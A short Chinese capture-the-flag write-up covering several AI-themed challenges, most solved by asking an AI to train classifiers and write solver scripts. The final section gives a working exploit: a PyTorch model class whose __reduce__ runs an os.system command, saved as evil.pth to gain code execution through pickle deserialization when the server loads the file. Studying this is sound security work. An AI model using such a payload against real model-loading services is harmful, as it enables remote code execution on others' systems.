目录
许哥的数字游戏
🤫歌的😡🔥
Aura JailBreak
明阳未许
🔥🌸 LittFlower: Fire Boom! 🌸🔥
许哥的数字游戏
就是用题目给的数据去训练个模型识别数字
先叫ai解读下附件内容
让ai根据数据集训练个模型
把题目交互方式告诉ai,写个解题脚本拿到flag
🤫歌的😡🔥
附件内容,一个是有火的图,一个是没火的图
还是让ai训练模型&写交互
拿到flag
Aura JailBreak
明阳未许
一样是ai秒了
🔥🌸 LittFlower: Fire Boom! 🌸🔥
import torch import torch.nn as nn from torchvision import models import builtins import os class MaliciousMobileNetV2(models.MobileNetV2): def __init__(self, num_classes=2): super().__init__(num_classes=num_classes) def __reduce__(self): state_dict = self.state_dict() fake_state_dict = state_dict.copy() if "classifier.1.weight" in fake_state_dict: del fake_state_dict["classifier.1.weight"] if "classifier.1.bias" in fake_state_dict: del fake_state_dict["classifier.1.bias"] cmd = "import os; os.system('cp /flag /app/static/flag.txt')" return (builtins.eval, ( "(exec(cmd), state_dict)[1]", {'cmd': cmd, 'state_dict': fake_state_dict} )) if __name__ == '__main__': model = MaliciousMobileNetV2(num_classes=2) save_path = 'evil.pth' print(f"正在生成 Payload: {save_path} ...") torch.save(model, save_path) print("生成成功!")上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag
